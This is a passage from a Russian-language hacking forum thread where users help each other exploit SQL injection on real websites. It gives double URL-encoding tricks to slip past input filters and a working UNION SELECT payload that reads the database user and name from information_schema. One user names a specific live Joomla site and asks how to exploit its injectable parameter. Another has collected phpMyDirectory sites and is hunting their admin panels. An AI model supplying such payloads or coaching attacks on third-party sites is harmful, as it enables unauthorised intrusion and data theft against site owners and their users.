 |
|
29.05.2014, 21:17
|
|
Новичок
Регистрация: 22.08.2008
Сообщений: 10
С нами:
9325117
Репутация:
6
|
|
Сообщение от qaz
спс, а как из точки получить такое содержимое, что это за тип шифрования?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку
у phpMyDirectory такие.
site.com/cp/
|
|
|
29.05.2014, 21:32
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
qaz, это обычный url енкодинг, то бишь хекс с префиксом процента.
Иногда бывает, что один параметр участвует в двух запросах, передается с одного хоста на другой, на котором может стоять обработчик всех параметров или на самом хосте они дважды декодируются по каким-либо причинам. Как параметр пройдёт первый хост, он декодируется в привычную форму и из %2527 как пример получится %27 и этот %27 уже на втором хосте в конечном итоге превратится в привычный всем нам апостроф '
|
|
|
|
29.05.2014, 21:58
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от qaz
спс, а как из точки получить такое содержимое, что это за тип шифрования?
я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку
http://web-master.pp.ru/info/05.shtml
Помогает когда фильтруются и другие символы.
%2e url кодирование.
%252e двойное url кодирование.
|
|
|
|
31.05.2014, 13:49
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Имеется уязвимость на site.com , вида site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10-- '
Колонки на вывод - 1 и 6.
Вывести через них database(), user() не получается, т.к. в ответ получаю пустое место.
Зато можно вывести версию @@version , version() - 5.0.95-log
При других запросах на вывод таблиц и т.д. - либо пустое место, вместо результата (как с user() ), либо ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
Есть ли какие-нибудь идеи, как узнать пользователя и текущую базу данных из приведённых мною выше данных?
|
|
|
|
31.05.2014, 15:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Aniweste, фильтр? Попробуйте определить, на что. Или length(database()) = 0?
Код:
site.com/x.php?id=-1' union+select+USER,2,3,4,5,DB,7,8,9,10+from+information_schema.PROCESSLIST+WHERE+info+rlike+0x50524f43--+
В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.
|
|
|
|
31.05.2014, 16:39
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Как раскрутить такое:
Код:
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit
где $limitstart, $limit - не фильтруются. |
|
|
|
31.05.2014, 16:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Для инъекции в LIMIT после ORDER BY сейчас нет векторов атак (возможно и не будет).
|
|
|
|
31.05.2014, 17:38
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Сообщение от XAMEHA
Aniweste,
фильтр? Попробуйте определить, на что. Или length(database()) = 0?
Код:
site.com/x.php?id=-1' union+select+USER,2,3,4,5,DB,7,8,9,10+from+information_schema.PROCESSLIST+WHERE+info+rlike+0x50524f43--+
В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.
Всё равно ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.
Нечаянно, пока дописывал, проверил
site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+fro-- - нет ошибки, site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+from-- - есть ошибка. Но думаю, что это бред
|
|
|
|
31.05.2014, 18:05
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Aniweste, всё нормально.
fro воспринимается как псевдоним для колонки, запрос корректен.
В случае с from в запрос из-за фильтра поступает муть и вы видите ошибку.
|
|
|
|
02.06.2014, 02:24
|
|
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
С нами:
10043772
Репутация:
273
|
|
Помогите разобраться, там Joomla.
http://k apper-sng.ru/insiderskaya-informaciya?start=4
пытаюсь раскрутить переменную start, но видимо мало еще понимаю механизм.
при запросе start=-4
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-4, 4' at line 13 SQL=SELECT a.id, a.title, a.alias, a.title_alias, a.introtext, a.checked_out, a.checked_out_time, a.catid, a.created, a.created_by, a.created_by_alias, CASE WHEN
пытаюсь подобрать столбцы, но не получается, не пропадает ошибка.
при start=99999 выдаётся пустая страница, без содержания. Вроде и есть инъекция (на сколько моих знаний хватает), но не могу понять, как использовать.
Покажите правильную дорогу пожалуйста. Благодарю заранее. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [dword]](/avatars/avatar35341.jpg?3727184){kind=avatar}
Похожие темы
Линейный вид
